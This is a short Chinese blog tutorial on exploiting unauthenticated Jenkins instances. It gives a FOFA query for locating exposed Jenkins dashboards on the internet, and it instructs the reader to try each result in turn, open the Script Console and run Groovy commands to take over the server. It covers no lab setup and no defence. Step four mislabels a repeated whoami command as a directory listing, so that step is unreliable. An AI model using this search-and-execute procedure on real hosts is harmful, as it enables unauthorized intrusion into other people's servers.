热门标签
热门文章
- 1智算中心布线的“融”与“荣”
- 2高质量的SQL优化技巧_sql语句csdn
- 3mac系统下idea连接github_idea 关联 git mac
- 4[漏洞复现]Mysql 身份认证绕过漏洞(CVE-2012-2122)_mysql 5.5.62 cve漏洞
- 5docker的安装和使用_brew install docker时 提示 cask 'docker' is already i
- 6赢在 CSDN:我在 CSDN 的成长,“长风破浪会有时”,如何保证自己有持续写作的动力?_csdn如何发展
- 7深入学习java源码之ReadWriteLock.readLock()与ReadWriteLock.writeLock()_lock.readlock().lock();
- 8Electron 应用开发实践指南 实战篇:需求概述
- 9【人工智能】-- 迁移学习_迁移学习 csdn
- 10谈EHS管理体系与软件的魅力:筑牢法律遵从的基石,引领企业可持续发展
当前位置: article > 正文
【Jenkins未授权访问漏洞 】
作者:笔触狂放9 | 2024-08-07 05:44:42
赞
踩
【Jenkins未授权访问漏洞 】
默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。
第一步:使用fofa语句搜索
搜索语句:
port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"
一个一个搜索,直到出现 Manage Jenkins,在打开的URL中...点击 Manage Jenkins
Scritp Console 再执行以下命令.
第二步:点进去后,页面往下翻看到Scritp Console——点击。
、
第三步:执行命令,查看当前用户名
println "whoami".execute().text
如下图就是执行中
第四步:执行命令,查看目录
println "whoami".execute().text
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/笔触狂放9/article/detail/941171
推荐阅读
相关标签
